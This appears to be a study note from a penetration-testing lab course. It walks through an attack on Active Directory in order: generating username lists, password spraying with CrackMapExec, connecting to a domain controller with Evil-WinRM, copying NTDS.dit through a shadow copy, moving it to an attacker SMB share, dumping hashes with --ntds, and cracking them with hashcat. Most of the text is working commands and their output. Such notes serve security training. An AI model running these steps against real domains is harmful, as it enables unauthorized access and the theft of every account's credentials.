Attacking Active Directory And NTDS

Once a Windows system is joined to a domain, it will no longer default to referencing the SAM database to validate logon requests. That domain-joined system will now send all authentication requests to the domain controller.

Dictionary Attacks against AD accounts using CrackMapExec
- Spraying Usernames
  - Create a custom list of usernames
- Launching the Attack with CrackMapExec
NTDS.dit after we have some credentials
- Connect to the Domain Controller with EvilWinRM
  - Check local group membership
  - Check domain admin privileges
- Create a Shadow Copy of C
- [[#Copy NTDS.dit from C]]
Alternate Fast Method CrackMapExec
Crack the NT Hash

Dictionary Attacks against AD accounts using CrackMapExec

dictionary attacks are noisy, can be denied due to login attempt restrictions of Group Policy.

Spraying Usernames

custom tailor whenever possible; search on social media; look at employment directory; look at email addresses

here are some username conventions

Username Convention	Practical Example for Jane Jill Doe
`firstinitiallastname`	jdoe
`firstinitialmiddleinitiallastname`	jjdoe
`firstnamelastname`	janedoe
`firstname.lastname`	jane.doe
`lastname.firstname`	doe.jane
`nickname`	doedoehacksstuff
find email structure by googling domain name "@inlanefreight.com", scrape social media sites and mashup potential valid usernames. Some organizations obfuscate username to prevent spraying. Use google dorks for search for inlanefreight.com filetype:pdf and find usernames in the PDF properties if they were generated using a graphics generator.

Create a custom list of usernames

> cat usernames.txt 
bwilliamson
benwilliamson
ben.willamson
willamson.ben
bburgerstien
bobburgerstien
bob.burgerstien
burgerstien.bob
jstevenson
jimstevenson
jim.stevenson
stevenson.jim

use an Automated List Generator Username Anarchy

> /username-anarchy -i /home/ltnbob/names.txt 

ben
benwilliamson
ben.williamson
benwilli
benwill
benw
b.williamson
bwilliamson
wben
w.ben
williamsonb
williamson
williamson.b
williamson.ben
bw
...

Launching the Attack with CrackMapExec

crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

On any Windows operating system, an admin can navigate to Event Viewer and view the Security events to see the exact actions that were logged. Noisy logs.

Once we have discovered some credentials, we could proceed to try to gain remote access to the target domain controller and capture the NTDS.dit file.

NTDS.dit after we have some credentials

NT Directory Services is used with Active Directory
NTDS.dit is stored in %systemroot%/ntds on the domain controllers in a forest
.dit is directory information tree
primary database file associated with AD
stores all omain usernames, password hashes, and other critical schema information
Capture this file -> compromise every account on domain controller

Connect to the Domain Controller with EvilWinRM

evil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'

Check local group membership

we need local admin rights to access the NTDS.dit file. (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights

*Evil-WinRM* PS C:\> net localgroup

Aliases for \\DC01

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators

Check domain admin privileges

*Evil-WinRM* PS C:\> net user bwilliamson

User name                    bwilliamson
Full Name                    Ben Williamson
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/13/2022 12:48:58 PM
Password expires             Never
Password changeable          1/14/2022 12:48:58 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/14/2022 2:07:49 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Domain Admins
The command completed successfully.

This account has both Administrators and Domain Administrator rights which means we can do just about anything we want, including making a copy of the NTDS.dit file.

Create a Shadow Copy of C:

NTDS.dit probably on C:. that's the default. We use VSSadmin to make a copy. Very useful because allows read & written to actively without needing to bring a particular application or system down

*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

Copy `NTDS.dit` from C:

*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

        1 file(s) copied.

Transfer NTDS to Attack Host

host an SMB server as seen in Windows File Transfer and Attacking SAM

*Evil-WinRM* PS C:\NTDS> cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData 

        1 file(s) moved.

Alternate Fast Method: CrackMapExec

a fast and convenient way of getting NTDS.dit

crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds

Crack the NT Hash

sudo hashcat -m 1000 92fd67fd2f49d0e83744aa82363f021b /usr/share/wordlists/rockyou.txt

if we can't crack it, try PtH